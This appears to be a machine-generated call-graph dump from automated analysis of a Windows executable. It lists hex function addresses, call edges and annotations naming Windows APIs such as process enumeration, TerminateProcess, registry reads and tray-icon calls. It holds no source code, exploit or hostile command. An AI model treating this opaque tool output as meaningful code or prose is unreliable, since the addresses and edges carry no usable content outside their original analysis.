103285->103287 103288 19bed9 22 API calls 103285->103288 103290 19d911 messages 103285->103290 103323 19c3ab 22 API calls messages 103285->103323 103330 19b4c8 22 API calls 103285->103330 103288->103285 103291 19d9ac messages 103290->103291 103324 19c3ab 22 API calls messages 103290->103324 103292 19d9c3 103291->103292 103325 1ae30a 22 API calls messages 103291->103325 103296 19c33d 103293->103296 103294 19c345 103294->103280 103295 1b014b 22 API calls 103295->103296 103296->103294 103296->103295 103297 19bf73 22 API calls 103296->103297 103299 19c32d 22 API calls 103296->103299 103332 19bed9 103296->103332 103297->103296 103299->103296 103318 1a0376 messages 103300->103318 103301 1b0413 29 API calls pre_c_initialization 103301->103318 103302 1e632b 103341 203fe1 82 API calls __wsopen_s 103302->103341 103303 1b014b 22 API calls 103303->103318 103305 1a1695 103310 19bed9 22 API calls 103305->103310 103317 1a049d messages 103305->103317 103307 19bed9 22 API calls 103307->103318 103308 1e5cdb 103314 19bed9 22 API calls 103308->103314 103308->103317 103309 1e625a 103340 203fe1 82 API calls __wsopen_s 103309->103340 103310->103317 103314->103317 103315 1b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103315->103318 103316 19bf73 22 API calls 103316->103318 103317->103271 103318->103301 103318->103302 103318->103303 103318->103305 103318->103307 103318->103308 103318->103309 103318->103315 103318->103316 103318->103317 103319 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103318->103319 103320 1e6115 103318->103320 103322 1a0aae messages 103318->103322 103336 1a1990 191 API calls 2 library calls 103318->103336 103337 1a1e50 41 API calls messages 103318->103337 103319->103318 103338 203fe1 82 API calls __wsopen_s 103320->103338 103339 203fe1 82 API calls __wsopen_s 103322->103339 103323->103285 103324->103291 103325->103291 103326->103264 103327->103258 103328->103258 103329->103258 103330->103285 103331->103287 103333 19befc __fread_nolock 103332->103333 103334 19beed 103332->103334 103333->103296 103334->103333 103335 1b017b 22 API calls 103334->103335 103335->103333 103336->103318 103337->103318 103338->103322 103339->103317 103340->103317 103341->103317 103342 1a0ebf 103343 1a0ed3 103342->103343 103349 1a1425 103342->103349 103344 1a0ee5 103343->103344 103345 1b014b 22 API calls 103343->103345 103346 1e562c 103344->103346 103348 1a0f3e 103344->103348 103433 19b4c8 22 API calls 103344->103433 103345->103344 103434 201b14 22 API calls 103346->103434 103354 1a049d messages 103348->103354 103375 1a2b20 103348->103375 103349->103344 103352 19bed9 22 API calls 103349->103352 103352->103344 103353 1e632b 103438 203fe1 82 API calls __wsopen_s 103353->103438 103355 1a0376 messages 103355->103353 103355->103354 103357 1a1695 103355->103357 103358 1b014b 22 API calls 103355->103358 103360 19bed9 22 API calls 103355->103360 103361 1e5cdb 103355->103361 103362 1e625a 103355->103362 103368 1b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103355->103368 103369 19bf73 22 API calls 103355->103369 103370 1e6115 103355->103370 103372 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103355->103372 103373 1b0413 29 API calls pre_c_initialization 103355->103373 103374 1a0aae messages 103355->103374 103431 1a1990 191 API calls 2 library calls 103355->103431 103432 1a1e50 41 API calls messages 103355->103432 103357->103354 103363 19bed9 22 API calls 103357->103363 103358->103355 103360->103355 103361->103354 103367 19bed9 22 API calls 103361->103367 103437 203fe1 82 API calls __wsopen_s 103362->103437 103363->103354 103367->103354 103368->103355 103369->103355 103435 203fe1 82 API calls __wsopen_s 103370->103435 103372->103355 103373->103355 103436 203fe1 82 API calls __wsopen_s 103374->103436 103376 1a2b61 103375->103376 103377 1a2fc0 103376->103377 103378 1a2b86 103376->103378 103522 1b05b2 5 API calls __Init_thread_wait 103377->103522 103379 1e7bd8 103378->103379 103380 1a2ba0 103378->103380 103485 217af9 103379->103485 103439 1a3160 103380->103439 103384 1a2fca 103388 19b329 22 API calls 103384->103388 103393 1a300b 103384->103393 103386 1e7be4 103386->103355 103387 1a3160 9 API calls 103389 1a2bc6 103387->103389 103396 1a2fe4 103388->103396 103390 1a2bfc 103389->103390 103389->103393 103392 1e7bfd 103390->103392 103415 1a2c18 __fread_nolock 103390->103415 103391 1e7bed 103391->103355 103527 203fe1 82 API calls __wsopen_s 103392->103527 103393->103391 103524 19b4c8 22 API calls 103393->103524 103523 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103396->103523 103397 1a3049 103525 1ae6e8 191 API calls 103397->103525 103399 1e7c15 103528 203fe1 82 API calls __wsopen_s 103399->103528 103402 1a2d3f 103403 1e7c78 103402->103403 103404 1a2d4c 103402->103404 103530 2161a2 54 API calls _wcslen 103403->103530 103406 1a3160 9 API calls 103404->103406 103408 1a2d59 103406->103408 103407 1b014b 22 API calls 103407->103415 103409 1e7da1 103408->103409 103412 1a3160 9 API calls 103408->103412 103421 1e7c10 103409->103421 103531 203fe1 82 API calls __wsopen_s 103409->103531 103410 1a3082 103526 1afe39 22 API calls 103410->103526 103411 1b017b 22 API calls 103411->103415 103417 1a2d73 103412->103417 103415->103397 103415->103399 103415->103402 103415->103407 103415->103411 103416 1a0340 191 API calls 103415->103416 103418 1e7c59 103415->103418 103415->103421 103416->103415 103417->103409 103420 19bed9 22 API calls 103417->103420 103423 1a2dd7 messages 103417->103423 103529 203fe1 82 API calls __wsopen_s 103418->103529 103420->103423 103421->103355 103422 1a3160 9 API calls 103422->103423 103423->103409 103423->103410 103423->103421 103423->103422 103425 1a2e8b messages 103423->103425 103449 1aac3e 103423->103449 103468 21ad47 103423->103468 103473 20f94a 103423->103473 103482 219fe8 103423->103482 103424 1a2f2d 103424->103355 103425->103424 103521 1ae322 22 API calls messages 103425->103521 103431->103355 103432->103355 103433->103344 103434->103354 103435->103374 103436->103354 103437->103354 103438->103354 103440 1a317d 103439->103440 103441 1a31a1 103439->103441 103448 1a2bb0 103440->103448 103534 1b05b2 5 API calls __Init_thread_wait 103440->103534 103532 1b05b2 5 API calls __Init_thread_wait 103441->103532 103443 1a31ab 103443->103440 103533 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103443->103533 103445 1a9f47 103445->103448 103535 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103445->103535 103448->103387 103536 198ec0 103449->103536 103453 1aac7f 103463 1ab09b _wcslen 103453->103463 103578 19c98d 39 API calls 103453->103578 103455 1abbbe 43 API calls 103455->103463 103460 196c03 22 API calls 103460->103463 103461 1ab1fb 103461->103423 103462 19c98d 39 API calls 103462->103463 103463->103455 103463->103460 103463->103461 103463->103462 103464 198ec0 53 API calls 103463->103464 103465 198577 22 API calls 103463->103465 103564 19396b 103463->103564 103574 193907 103463->103574 103579 1b4d98 103463->103579 103589 197ad5 103463->103589 103594 19ad40 22 API calls __fread_nolock 103463->103594 103595 197b1a 22 API calls 103463->103595 103464->103463 103465->103463 103469 198ec0 53 API calls 103468->103469 103470 21ad63 103469->103470 103642 1fdd87 CreateToolhelp32Snapshot Process32FirstW 103470->103642 103472 21ad72 103472->103423 103474 1b017b 22 API calls 103473->103474 103475 20f95b 103474->103475 103476 19423c 22 API calls 103475->103476 103477 20f965 103476->103477 103478 198ec0 53 API calls 103477->103478 103479 20f97c GetEnvironmentVariableW 103478->103479 103663 20160f 22 API calls 103479->103663 103481 20f999 messages 103481->103423 103664 2189b6 103482->103664 103484 219ff8 103484->103423 103486 217b52 103485->103486 103487 217b38 103485->103487 103779 2160e6 103486->103779 103790 203fe1 82 API calls __wsopen_s 103487->103790 103491 1a0340 190 API calls 103492 217bc1 103491->103492 103493 217c5c 103492->103493 103496 217c03 103492->103496 103516 217b4a 103492->103516 103494 217cb0 103493->103494 103495 217c62 103493->103495 103497 198ec0 53 API calls 103494->103497 103494->103516 103791 201ad8 22 API calls 103495->103791 103501 20148b 22 API calls 103496->103501 103499 217cc2 103497->103499 103502 19c2c9 22 API calls 103499->103502 103500 217c85 103792 19bd07 22 API calls 103500->103792 103505 217c3b 103501->103505 103503 217ce6 CharUpperBuffW 103502->103503 103507 217d00 103503->103507 103506 1a2b20 190 API calls 103505->103506 103506->103516 103508 217d53 103507->103508 103509 217d07 103507->103509 103510 198ec0 53 API calls 103508->103510 103786 20148b 103509->103786 103511 217d5b 103510->103511 103793 1aaa65 23 API calls 103511->103793 103515 1a2b20 190 API calls 103515->103516 103516->103386 103517 217d65 103517->103516 103518 198ec0 53 API calls 103517->103518 103519 217d80 103518->103519 103794 19bd07 22 API calls 103519->103794 103521->103425 103522->103384 103523->103393 103524->103397 103525->103410 103526->103410 103527->103421 103528->103421 103529->103421 103530->103417 103531->103421 103532->103443 103533->103440 103534->103445 103535->103448 103537 198ed2 103536->103537 103538 198ed5 103536->103538 103559 1abc58 103537->103559 103539 198f0b 103538->103539 103540 198edd 103538->103540 103542 1d6b1f 103539->103542 103545 198f1d 103539->103545 103550 1d6a38 103539->103550 103596 1b5536 26 API calls 103540->103596 103599 1b54f3 26 API calls 103542->103599 103543 198eed 103549 1b014b 22 API calls 103543->103549 103597 1afe6f 51 API calls 103545->103597 103546 1d6b37 103546->103546 103551 198ef7 103549->103551 103553 1b017b 22 API calls 103550->103553 103558 1d6ab1 103550->103558 103552 19b329 22 API calls 103551->103552 103552->103537 103554 1d6a81 103553->103554 103555 1b014b 22 API calls 103554->103555 103556 1d6aa8 103555->103556 103557 19b329 22 API calls 103556->103557 103557->103558 103598 1afe6f 51 API calls 103558->103598 103560 1b014b 22 API calls 103559->103560 103561 1abc65 103560->103561 103562 19b329 22 API calls 103561->103562 103563 1abc70 103562->103563 103563->103453 103565 193996 ___scrt_fastfail 103564->103565 103600 195f32 103565->103600 103568 193a1c 103570 1d40cd Shell_NotifyIconW 103568->103570 103571 193a3a Shell_NotifyIconW 103568->103571 103604 1961a9 103571->103604 103573 193a50 103573->103463 103575 193969 103574->103575 103576 193919 ___scrt_fastfail 103574->103576 103575->103463 103577 193938 Shell_NotifyIconW 103576->103577 103577->103575 103578->103463 103580 1b4e1b 103579->103580 103581 1b4da6 103579->103581 103641 1b4e2d 40 API calls 4 library calls 103580->103641 103588 1b4dcb 103581->103588 103639 1bf649 20 API calls _abort 103581->103639 103584 1b4e28 103584->103463 103585 1b4db2 103640 1c2b5c 26 API calls _abort 103585->103640 103587 1b4dbd 103587->103463 103588->103463 103590 1b017b 22 API calls 103589->103590 103591 197afa 103590->103591 103592 1b014b 22 API calls 103591->103592 103593 197b08 103592->103593 103593->103463 103594->103463 103595->103463 103596->103543 103597->103543 103598->103542 103599->103546 103601 195f4e 103600->103601 103602 1939eb 103600->103602 103601->103602 103603 1d5070 DestroyIcon 103601->103603 103602->103568 103634 1fd11f 42 API calls _strftime 103602->103634 103603->103602 103605 1962a8 103604->103605 103606 1961c6 103604->103606 103605->103573 103607 197ad5 22 API calls 103606->103607 103608 1961d4 103607->103608 103609 1d5278 LoadStringW 103608->103609 103610 1961e1 103608->103610 103613 1d5292 103609->103613 103611 198577 22 API calls 103610->103611 103612 1961f6 103611->103612 103614 196203 103612->103614 103621 1d52ae 103612->103621 103616 19bed9 22 API calls 103613->103616 103619 196229 ___scrt_fastfail 103613->103619 103614->103613 103615 19620d 103614->103615 103617 196b7c 22 API calls 103615->103617 103616->103619 103618 19621b 103617->103618 103635 197bb5 22 API calls 103618->103635 103623 19628e Shell_NotifyIconW 103619->103623 103621->103619 103622 1d52f1 103621->103622 103624 19bf73 22 API calls 103621->103624 103638 1afe6f 51 API calls 103622->103638 103623->103605 103625 1d52d8 103624->103625 103636 1fa350 23 API calls 103625->103636 103628 1d5310 103630 196b7c 22 API calls 103628->103630 103629 1d52e3 103637 197bb5 22 API calls 103629->103637 103632 1d5321 103630->103632 103633 196b7c 22 API calls 103632->103633 103633->103619 103634->103568 103635->103619 103636->103629 103637->103622 103638->103628 103639->103585 103640->103587 103641->103584 103652 1fe80e 103642->103652 103644 1fde86 CloseHandle 103644->103472 103645 1fddd4 Process32NextW 103645->103644 103649 1fddcd 103645->103649 103646 19bf73 22 API calls 103646->103649 103647 19b329 22 API calls 103647->103649 103649->103644 103649->103645 103649->103646 103649->103647 103658 19568e 22 API calls 103649->103658 103659 197bb5 22 API calls 103649->103659 103660 1ae36b 41 API calls 103649->103660 103653 1fe819 103652->103653 103654 1fe830 103653->103654 103657 1fe836 103653->103657 103661 1b6722 GetStringTypeW _strftime 103653->103661 103662 1b666b 39 API calls _strftime 103654->103662 103657->103649 103658->103649 103659->103649 103660->103649 103661->103653 103662->103657 103663->103481 103665 198ec0 53 API calls 103664->103665 103666 2189ed 103665->103666 103690 218a32 messages 103666->103690 103702 219730 103666->103702 103668 218cde 103669 218eac 103668->103669 103675 218cec 103668->103675 103753 219941 60 API calls 103669->103753 103672 218ebb 103674 218ec7 103672->103674 103672->103675 103673 198ec0 53 API calls 103692 218aa6 103673->103692 103674->103690 103715 2188e3 103675->103715 103680 218d25 103730 1affe0 103680->103730 103683 218d45 103737 203fe1 82 API calls __wsopen_s 103683->103737 103684 218d5f 103738 197e12 103684->103738 103687 218d50 GetCurrentProcess TerminateProcess 103687->103684 103690->103484 103692->103668 103692->103673 103692->103690 103735 1f4ad3 22 API calls __fread_nolock 103692->103735 103736 218f7a 42 API calls _strftime 103692->103736 103693 218f22 103693->103690 103698 218f36 FreeLibrary 103693->103698 103695 218d9e 103750 2195d8 75 API calls 103695->103750 103698->103690 103700 218daf 103700->103693 103751 1a1ca0 22 API calls 103700->103751 103752 19b4c8 22 API calls 103700->103752 103754 2195d8 75 API calls 103700->103754 103703 19c2c9 22 API calls 103702->103703 103704 21974b CharLowerBuffW 103703->103704 103755 1f9805 103704->103755 103708 19bf73 22 API calls 103709 219787 103708->103709 103762 19acc0 22 API calls __fread_nolock 103709->103762 103711 21979b 103712 19adf4 22 API calls 103711->103712 103714 2197a5 _wcslen 103712->103714 103713 2198bb _wcslen 103713->103692 103714->103713 103763 218f7a 42 API calls _strftime 103714->103763 103716 218949 103715->103716 103717 2188fe 103715->103717 103721 219af3 103716->103721 103718 1b017b 22 API calls 103717->103718 103719 218920 103718->103719 103719->103716 103720 1b014b 22 API calls 103719->103720 103720->103719 103722 219d08 messages 103721->103722 103729 219b17 _strcat _wcslen 103721->103729 103722->103680 103723 19ca5b 39 API calls 103723->103729 103724 19c98d 39 API calls 103724->103729 103725 19c63f 39 API calls 103725->103729 103726 198ec0 53 API calls 103726->103729 103727 1bed7c 21 API calls ___std_exception_copy 103727->103729 103729->103722 103729->103723 103729->103724 103729->103725 103729->103726 103729->103727 103766 1ff8c5 24 API calls _wcslen 103729->103766 103731 1afff5 103730->103731 103732 1b008d SetErrorMode 103731->103732 103733 1b005b 103731->103733 103734 1b007b CloseHandle 103731->103734 103732->103733 103733->103683 103733->103684 103734->103733 103735->103692 103736->103692 103737->103687 103739 197e1a 103738->103739 103740 1b014b 22 API calls 103739->103740 103741 197e28 103740->103741 103767 198445 103741->103767 103744 198470 103770 19c760 103744->103770 103746 198480 103747 1b017b 22 API calls 103746->103747 103748 19851c 103746->103748 103747->103748 103748->103700 103749 1a1ca0 22 API calls 103748->103749 103749->103695 103750->103700 103751->103700 103752->103700 103753->103672 103754->103700 103756 1f9825 _wcslen 103755->103756 103759 1f985a 103756->103759 103760 1f9919 103756->103760 103761 1f9914 103756->103761 103759->103761 103764 1ae36b 41 API calls 103759->103764 103760->103761 103765 1ae36b 41 API calls 103760->103765 103761->103708 103761->103714 103762->103711 103763->103713 103764->103759 103765->103760 103766->103729 103768 1b014b 22 API calls 103767->103768 103769 197e30 103768->103769 103769->103744 103771 19c76b 103770->103771 103772 1e1285 103771->103772 103777 19c773 messages 103771->103777 103773 1b014b 22 API calls 103772->103773 103774 1e1291 103773->103774 103775 19c77a 103775->103746 103777->103775 103778 19c7e0 22 API calls messages 103777->103778 103778->103777 103780 216101 103779->103780 103785 21614f 103779->103785 103781 1b017b 22 API calls 103780->103781 103783 216123 103781->103783 103782 1b014b 22 API calls 103782->103783 103783->103782 103783->103785 103795 201400 22 API calls 103783->103795 103785->103491 103787 2014d2 103786->103787 103788 201499 103786->103788 103787->103515 103788->103787 103789 1b014b 22 API calls 103788->103789 103789->103787 103790->103516 103791->103500 103792->103516 103793->103517 103794->103516 103795->103783 103796 19f4dc 103799 19cab0 103796->103799 103800 19cacb 103799->103800 103801 1e14be 103800->103801 103802 1e150c 103800->103802 103820 19caf0 103800->103820 103805 1e14c8 103801->103805 103808 1e14d5 103801->103808 103801->103820 103843 2162ff 191 API calls 2 library calls 103802->103843 103841 216790 191 API calls 103805->103841 103807 1abc58 22 API calls 103807->103820 103822 19cdc0 103808->103822 103842 216c2d 191 API calls 2 library calls 103808->103842 103811 19cf80 40 API calls 103811->103820 103812 1e179f 103812->103812 103815 19cdee 103817 1e16e8 103846 216669 82 API calls 103817->103846 103820->103807 103820->103811 103820->103815 103820->103817 103820->103822 103826 1ae807 40 API calls 103820->103826 103827 1a0340 191 API calls 103820->103827 103828 19bed9 22 API calls 103820->103828 103830 19be2d 103820->103830 103834 1ae7c1 40 API calls 103820->103834 103835 1aaa99 191 API calls 103820->103835 103836 1b05b2 5 API calls __Init_thread_wait 103820->103836 103837 1b0413 29 API calls __onexit 103820->103837 103838 1b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103820->103838 103839 1af4df 82 API calls 103820->103839 103840 1af346 191 API calls 103820->103840 103844 19b4c8 22 API calls 103820->103844 103845 1effaf 22 API calls 103820->103845 103822->103815 103847 203fe1 82 API calls __wsopen_s 103822->103847 103826->103820 103827->103820 103828->103820 103831 19be38 103830->103831 103832 19be67 103831->103832 103848 19bfa5 40 API calls 103831->103848 103832->103820 103834->103820 103835->103820 103836->103820 103837->103820 103838->103820 103839->103820 103840->103820 103841->103808 103842->103822 103843->103820 103844->103820 103845->103820 103846->103822 103847->103812 103848->103832 103849 1a15ff 103856 1ae3d5 103849->103856 103851 1a1615 103865 1ae439 103851->103865 103853 1a163f 103877 203fe1 82 API calls __wsopen_s 103853->103877 103855 1e6207 103857 1ae3e3 103856->103857 103858 1ae3f6 103856->103858 103878 19b4c8 22 API calls 103857->103878 103859 1ae3fb 103858->103859 103860 1ae429 103858->103860 103862 1b014b 22 API calls 103859->103862 103879 19b4c8 22 API calls 103860->103879 103864 1ae3ed 103862->103864 103864->103851 103866 197ad5 22 API calls 103865->103866 103867 1ae470 103866->103867 103868 19b329 22 API calls 103867->103868 103870 1ae4a1 103867->103870 103869 1ee53e 103868->103869 103880 197bb5 22 API calls 103869->103880 103870->103853 103872 1ee549 103881 1ae7c1 40 API calls 103872->103881 103874 1ee55c 103876 1ee560 103874->103876 103882 19b4c8 22 API calls 103874->103882 103876->103876 103877->103855 103878->103864 103879->103864 103880->103872 103881->103874 103882->103876 103883 1c947a 103884 1c9487 103883->103884 103888 1c949f 103883->103888 103940 1bf649 20 API calls _abort 103884->103940 103886 1c948c 103941 1c2b5c 26 API calls _abort 103886->103941 103889 1c94fa 103888->103889 103897 1c9497 103888->103897 103942 1d0144 21 API calls 2 library calls 103888->103942 103903 1bdcc5 103889->103903 103892 1c9512 103910 1c8fb2 103892->103910 103894 1c9519 103895 1bdcc5 __fread_nolock 26 API calls 103894->103895 103894->103897 103896 1c9545 103895->103896 103896->103897 103898 1bdcc5 __fread_nolock 26 API calls 103896->103898 103899 1c9553 103898->103899 103899->103897 103900 1bdcc5 __fread_nolock 26 API calls 103899->103900 103901 1c9563 103900->103901 103902 1bdcc5 __fread_nolock 26 API calls 103901->103902 103902->103897 103904 1bdcd1 103903->103904 103905 1bdce6 103903->103905 103943 1bf649 20 API calls _abort 103904->103943 103905->103892 103907 1bdcd6 103944 1c2b5c 26 API calls _abort 103907->103944 103909 1bdce1 103909->103892 103911 1c8fbe BuildCatchObjectHelperInternal 103910->103911 103912 1c8fde 103911->103912 103913 1c8fc6 103911->103913 103915 1c90a4 103912->103915 103920 1c9017 103912->103920 104011 1bf636 20 API calls _abort 103913->104011 104018 1bf636 20 API calls _abort 103915->104018 103916 1c8fcb 104012 1bf649 20 API calls _abort 103916->104012 103918 1c90a9 104019 1bf649 20 API calls _abort 103918->104019 103922 1c903b 103920->103922 103923 1c9026 103920->103923 103945 1c54ba EnterCriticalSection 103922->103945 104013 1bf636 20 API calls _abort 103923->104013 103925 1c9033 104020 1c2b5c 26 API calls _abort 103925->104020 103927 1c9041 103929 1c905d 103927->103929 103930 1c9072 103927->103930 103928 1c902b 104014 1bf649 20 API calls _abort 103928->104014 104015 1bf649 20 API calls _abort 103929->104015 103946 1c90c5 103930->103946 103932 1c8fd3 __fread_nolock 103932->103894 103936 1c9062 104016 1bf636 20 API calls _abort 103936->104016 103937 1c906d 104017 1c909c LeaveCriticalSection __wsopen_s 103937->104017 103940->103886 103941->103897 103942->103889 103943->103907 103944->103909 103945->103927 103947 1c90ef 103946->103947 103948 1c90d7 103946->103948 103950 1c9459 103947->103950 103960 1c9134 103947->103960 104030 1bf636 20 API calls _abort 103948->104030 104054 1bf636 20 API calls _abort 103950->104054 103951 1c90dc 104031 1bf649 20 API calls _abort 103951->104031 103954 1c945e 104055 1bf649 20 API calls _abort 103954->104055 103955 1c913f 104032 1bf636 20 API calls _abort 103955->104032 103958 1c90e4 103958->103937 103959 1c9144 104033 1bf649 20 API calls _abort 103959->104033 103960->103955 103960->103958 103963 1c916f 103960->103963 103961 1c914c 104056 1c2b5c 26 API calls _abort 103961->104056 103965 1c9188 103963->103965 103966 1c91ae 103963->103966 103967 1c91ca 103963->103967 103965->103966 103973 1c9195 103965->103973 104034 1bf636 20 API calls _abort 103966->104034 104037 1c3b93 21 API calls 2 library calls 103967->104037 103970 1c91b3 104035 1bf649 20 API calls _abort 103970->104035 104021 1cfc1b 103973->104021 103974 1c91e1 104038 1c2d38 103974->104038 103975 1c9333 103978 1c93a9 103975->103978 103982 1c934c GetConsoleMode 103975->103982 103976 1c91ba 104036 1c2b5c 26 API calls _abort 103976->104036 103981 1c93ad ReadFile 103978->103981 103980 1c91ea 103983 1c2d38 _free 20 API calls 103980->103983 103984 1c93c7 103981->103984 103985 1c9421 GetLastError 103981->103985 103982->103978 103986 1c935d 103982->103986 103987 1c91f1 103983->103987 103984->103985 103990 1c939e 103984->103990 103988 1c942e 103985->103988 103989 1c9385 103985->103989 103986->103981 103991 1c9363 ReadConsoleW 103986->103991 103992 1c91fb 103987->103992 103993 1c9216 103987->103993 104052 1bf649 20 API calls _abort 103988->104052 104008 1c91c5 __fread_nolock 103989->104008 104049 1bf613 20 API calls __dosmaperr 103989->104049 104004 1c93ec 103990->104004 104005 1c9403 103990->104005 103990->104008 103991->103990 103996 1c937f GetLastError 103991->103996 104044 1bf649 20 API calls _abort 103992->104044 104046 1c97a4 103993->104046 103996->103989 103997 1c2d38 _free 20 API calls 103997->103958 103999 1c9433 104053 1bf636 20 API calls _abort 103999->104053 104001 1c9200 104045 1bf636 20 API calls _abort 104001->104045 104050 1c8de1 31 API calls 2 library calls 104004->104050 104007 1c941a 104005->104007 104005->104008 104051 1c8c21 29 API calls __fread_nolock 104007->104051 104008->103997 104010 1c941f 104010->104008 104011->103916 104012->103932 104013->103928 104014->103925 104015->103936 104016->103937 104017->103932 104018->103918 104019->103925 104020->103932 104022 1cfc28 104021->104022 104023 1cfc35 104021->104023 104057 1bf649 20 API calls _abort 104022->104057 104026 1cfc41 104023->104026 104058 1bf649 20 API calls _abort 104023->104058 104025 1cfc2d 104025->103975 104026->103975 104028 1cfc62 104059 1c2b5c 26 API calls _abort 104028->104059 104030->103951 104031->103958 104032->103959 104033->103961 104034->103970 104035->103976 104036->104008 104037->103974 104039 1c2d6c __dosmaperr 104038->104039 104040 1c2d43 RtlFreeHeap 104038->104040 104039->103980 104040->104039 104041 1c2d58 104040->104041 104060 1bf649 20 API calls _abort 104041->104060 104043 1c2d5e GetLastError 104043->104039 104044->104001 104045->104008 104061 1c970b 104046->104061 104049->104008 104050->104008 104051->104010 104052->103999 104053->104008 104054->103954 104055->103961 104056->103958 104057->104025 104058->104028 104059->104025 104060->104043 104070 1c5737 104061->104070 104063 1c971d 104064 1c9725 104063->104064 104065 1c9736 SetFilePointerEx 104063->104065 104083 1bf649 20 API calls _abort 104064->104083 104066 1c972a 104065->104066 104067 1c974e GetLastError 104065->104067 104066->103973 104084 1bf613 20 API calls __dosmaperr 104067->104084 104071 1c5759 104070->104071 104072 1c5744 104070->104072 104077 1c577e 104071->104077 104087 1bf636 20 API calls _abort 104071->104087 104085 1bf636 20 API calls _abort 104072->104085 104075 1c5749 104086 1bf649 20 API calls _abort 104075->104086 104077->104063 104078 1c5789 104088 1bf649 20 API calls _abort 104078->104088 104079 1c5751 104079->104063 104081 1c5791 104089 1c2b5c 26 API calls _abort 104081->104089 104083->104066 104084->104066 104085->104075 104086->104079 104087->104078 104088->104081 104089->104079 104090 1ee737 104092 1ee6e4 104090->104092 104093 1fe83e SHGetFolderPathW 104092->104093 104094 198577 22 API calls 104093->104094 104095 1fe86b 104094->104095 104095->104092 104096 191033 104101 1968b4 104096->104101 104100 191042 104102 19bf73 22 API calls 104101->104102 104103 196922 104102->104103 104109 19589f 104103->104109 104105 1969bf 104106 191038 104105->104106 104112 196b14 22 API calls __fread_nolock 104105->104112 104108 1b0413 29 API calls __onexit 104106->104108 104108->104100 104113 1958cb 104109->104113 104112->104105 104114 1958d8 104113->104114 104115 1958be 104113->104115 104114->104115 104116 1958df RegOpenKeyExW 104114->104116 104115->104105 104116->104115 104117 1958f9 RegQueryValueExW 104116->104117 104118 19591a 104117->104118 104119 19592f RegCloseKey 104117->104119 104118->104119 104119->104115 104120 1936f5 104123 19370f 104120->104123 104124 193726 104123->104124 104125 19372b 104124->104125 104126 19378a 104124->104126 104162 193788 104124->104162 104130 193738 104125->104130 104131 193804 PostQuitMessage 104125->104131 104128 1d3df4 104126->104128 104129 193790 104126->104129 104127 19376f DefWindowProcW 104153 193709 104127->104153 104178 192f92 10 API calls 104128->104178 104135 1937bc SetTimer RegisterWindowMessageW 104129->104135 104136 193797 104129->104136 104132 193743 104130->104132 104133 1d3e61 104130->104133 104131->104153 104137 19374d 104132->104137 104138 19380e 104132->104138 104181 1fc8f7 66 API calls ___scrt_fastfail 104133->104181 104139 1937e5 CreatePopupMenu 104135->104139 104135->104153 104142 1d3d95 104136->104142 104143 1937a0 KillTimer 104136->104143 104144 193758 104137->104144 104157 1d3e46 104137->104157 104168 1afcad 104138->104168 104139->104153 104141 1d3e15 104179 1af23c 41 API calls 104141->104179 104147 1d3d9a 104142->104147 104148 1d3dd0 MoveWindow 104142->104148 104149 193907 Shell_NotifyIconW 104143->104149 104150 193763 104144->104150 104151 1937f2 104144->104151 104154 1d3dbf SetFocus 104147->104154 104155 1d3da0 104147->104155 104148->104153 104156 1937b3 104149->104156 104150->104127 104165 193907 Shell_NotifyIconW 104150->104165 104176 19381f 76 API calls ___scrt_fastfail 104151->104176 104152 1d3e73 104152->104127 104152->104153 104154->104153 104155->104150 104159 1d3da9 104155->104159 104175 1959ff DeleteObject DestroyWindow 104156->104175 104157->104127 104180 1f1423 22 API calls 104157->104180 104177 192f92 10 API calls 104159->104177 104162->104127 104163 193802 104163->104153 104166 1d3e3a 104165->104166 104167 19396b 61 API calls 104166->104167 104167->104162 104169 1afd4b 104168->104169 104170 1afcc5 ___scrt_fastfail 104168->104170 104169->104153 104171 1961a9 56 API calls 104170->104171 104173 1afcec 104171->104173 104172 1afd34 KillTimer SetTimer 104172->104169 104173->104172 104174 1efe2b Shell_NotifyIconW 104173->104174 104174->104172 104175->104153 104176->104163 104177->104153 104178->104141 104179->104150 104180->104162 104181->104152 104182 1e5650 104183 1ae3d5 22 API calls 104182->104183 104184 1e5666 104183->104184 104189 1e56e1 104184->104189 104191 1aaa65 23 API calls 104184->104191 104186 1e56c1 104186->104189 104192 20247e 22 API calls 104186->104192 104188 1e61d7 104189->104188 104193 203fe1 82 API calls __wsopen_s 104189->104193 104191->104186 104192->104189 104193->104188 104194 1b076b 104195 1b0777 BuildCatchObjectHelperInternal 104194->104195 104224 1b0221 104195->104224 104197 1b077e 104198 1b08d1 104197->104198 104201 1b07a8 104197->104201 104265 1b0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104198->104265 104200 1b08d8 104258 1b51c2 104200->104258 104213 1b07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104201->104213 104235 1c27ed 104201->104235 104208 1b07c7 104210 1b0848 104243 1b0cc9 104210->104243 104212 1b084e 104247 19331b 104212->104247 104213->104210 104261 1b518a 38 API calls 2 library calls 104213->104261 104218 1b086a 104218->104200 104219 1b086e 104218->104219 104220 1b0877 104219->104220 104263 1b5165 28 API calls _abort 104219->104263 104264 1b03b0 13 API calls 2 library calls 104220->104264 104223 1b087f 104223->104208 104225 1b022a 104224->104225 104267 1b0a08 IsProcessorFeaturePresent 104225->104267 104227 1b0236 104268 1b3004 10 API calls 3 library calls 104227->104268 104229 1b023f 104229->104197 104230 1b023b 104230->104229 104269 1c2687 104230->104269 104233 1b0256 104233->104197 104236 1c2804 104235->104236 104237 1b0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104236->104237 104238 1b07c1 104237->104238 104238->104208 104239 1c2791 104238->104239 104240 1c27c0 104239->104240 104241 1b0dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104240->104241 104242 1c27e9 104241->104242 104242->104213 104342 1b26b0 104243->104342 104246 1b0cef 104246->104212 104248 193327 